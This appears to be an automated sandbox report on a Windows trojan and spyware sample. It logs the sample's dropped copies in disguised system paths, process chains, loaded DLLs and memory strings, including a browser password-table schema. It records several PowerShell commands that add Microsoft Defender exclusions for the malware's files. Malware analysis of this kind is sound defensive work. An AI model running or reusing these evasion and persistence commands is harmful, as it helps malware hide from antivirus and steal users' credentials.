                      Source: QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Window created: window name: CLIPBRDWNDCLASS
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
                      Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP
                      Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\BKcXESYN.log 4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                      Source: rcIHUqTf.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: iyARkwDy.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: aVrcADnQ.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: YKVbAlIQ.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: IIQWghSC.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: yZwGwFNU.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ordqNcIm.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: 84JufgBTrA.exe, 00000000.00000002.1795623962.0000000001248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs 84JufgBTrA.exe
                      Source: 84JufgBTrA.exe, 00000000.00000000.1715178285.0000000000DD4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 84JufgBTrA.exe
                      Source: 84JufgBTrA.exe, 00000000.00000002.1913805762.000000001C522000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 84JufgBTrA.exe
                      Source: 84JufgBTrA.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 84JufgBTrA.exe
                      Source: 84JufgBTrA.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 84JufgBTrA.exe Static PE information: Section: .reloc ZLIB complexity 0.99609375
                      Source: RuntimeBroker.exe.0.dr Static PE information: Section: .reloc ZLIB complexity 0.99609375
                      Source: MaEiPrsQRasQLtRzJjb.exe.0.dr Static PE information: Section: .reloc ZLIB complexity 0.99609375
                      Source: MaEiPrsQRasQLtRzJjb.exe0.0.dr Static PE information: Section: .reloc ZLIB complexity 0.99609375
                      Source: MaEiPrsQRasQLtRzJjb.exe1.0.dr Static PE information: Section: .reloc ZLIB complexity 0.99609375
                      Source: rcIHUqTf.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: iyARkwDy.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: aVrcADnQ.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: YKVbAlIQ.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: IIQWghSC.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: yZwGwFNU.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: ordqNcIm.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@44/334@0/2
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe File created: C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe File created: C:\Users\user\Desktop\crpSXvpM.log
                      Source: C:\Recovery\RuntimeBroker.exe Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\84b30d7be2c6da00c99dac410d91ab1630c8ad6ee058ff459919b68628dd5e94
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe File created: C:\Users\user\AppData\Local\Temp\b5tsyhrw
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat"
                      Source: 84JufgBTrA.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 84JufgBTrA.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe File read: C:\Users\desktop.ini
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: 41D8Sq4Amo.38.dr, JX99Ui9DKP.38.dr, KPnOeUK2hC.38.dr, WiyvhDEUt3.38.dr, 7HPrQ3iRpB.38.dr, sMpX30z8nf.38.dr, 07mQC2qkqc.38.dr, xIRy7cT0TR.38.dr, 1XquzIm2yn.38.dr, R7BqvEYBD4.38.dr, J6AWrf32cf.38.dr, ccuFnUOYDP.38.dr, y1RRv9Vvha.38.dr, OXRiWuigiF.38.dr, l9JFYzHTae.38.dr, RXZbWi86Jz.38.dr, HdaAl8ha4c.38.dr, 5TAeaj1clT.38.dr, ySZGCfyqzM.38.dr, 239f1iyBT2.38.dr, NU0jamWTKp.38.dr, WNa7C4RjEo.38.dr, 5DcaR7Ru1G.38.dr, UhyiGUzGJM.38.dr, O5gjxwzfB0.38.dr, tLH0kI3Umz.38.dr, bnfAeo81ZD.38.dr, lGyohRsTwz.38.dr, cfulouQZn9.38.dr, aK4aolTbbR.38.dr, viOyRYnl3k.38.dr, FjYPCsB9aj.38.dr, FTVa4y9vCu.38.dr, FDjPTk1pNt.38.dr, swWu7GQPWr.38.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 84JufgBTrA.exe ReversingLabs: Detection: 68%
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe File read: C:\Users\user\Desktop\84JufgBTrA.exe
                      Source: unknown Process created: C:\Users\user\Desktop\84JufgBTrA.exe "C:\Users\user\Desktop\84JufgBTrA.exe"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC0BA.tmp" "c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP"
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe
                      Source: unknown Process created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknown Process created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown Process created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknown Process created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknown Process created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Process created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknown Process created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                      Source: unknown Process created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknown Process created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                      Source: unknown Process created: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe "C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknown Process created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: ktmw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: version.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
